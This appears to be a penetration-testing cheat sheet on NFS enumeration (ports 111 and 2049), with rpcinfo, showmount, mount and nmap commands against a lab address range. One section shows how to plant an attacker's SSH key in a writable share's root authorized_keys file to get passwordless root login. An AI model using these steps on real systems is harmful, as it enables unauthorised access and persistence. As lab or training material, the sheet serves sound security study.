# NFS Enumeration (Port 111, 2049) ## Quick Intro * Developed in 1984 by Sun Microsystem and similar to SMB because it allows access to files over a network. * Common ports used by NFS are **port 111 and 2049 tcp/udp** * It is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory. ## Identifying if NFS is in use ``` rpcinfo -p # If you get 111 and 2049 listed , shares are enable and we can mount them ``` ## Show all mounts * if nfs is available, use **showmount** to view available mounting points ``` showmount -e $ip ``` ## Mount a NFS share * you can then mount the file system with the **mount** command and interact with remote system * first create the directory for mounting - `mkdir /mnt/nfs` ``` mount -t nfs $ip:/share /mnt/nfs ``` ## Unmounting the shares ``` umount -f -l /mnt/nfs # -f – Force unmount (in case of an unreachable NFS system). (Requires kernel 2.1.116 or later.) # -l – Lazy unmount. Detach the filesystem from the filesystem hierarchy now, and cleanup all references to the filesystem as soon as it is not busy anymore. (Requires kernel 2.4.11 or later.) ``` ## Permission Denied ? {% embed url="" %} ## Further Exploitation * **If you can write to the remote hosts, try to put ssh key there** so that we can get remote ssh without password , ``` ssh keygen # Generating ssh keys cat ~/.ssh/id_rsa.pub >> /mnt/nfs/root/.ssh/authorized_keys # Putting it to remote host ssh root@$ip # Now can login without password on target ``` ## Nmap Scan on RPCbind and NFS ``` nmap -v -p 111 10.11.1.1-254 nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254 nmap -p 111 --script nfs* 10.11.1.72 ```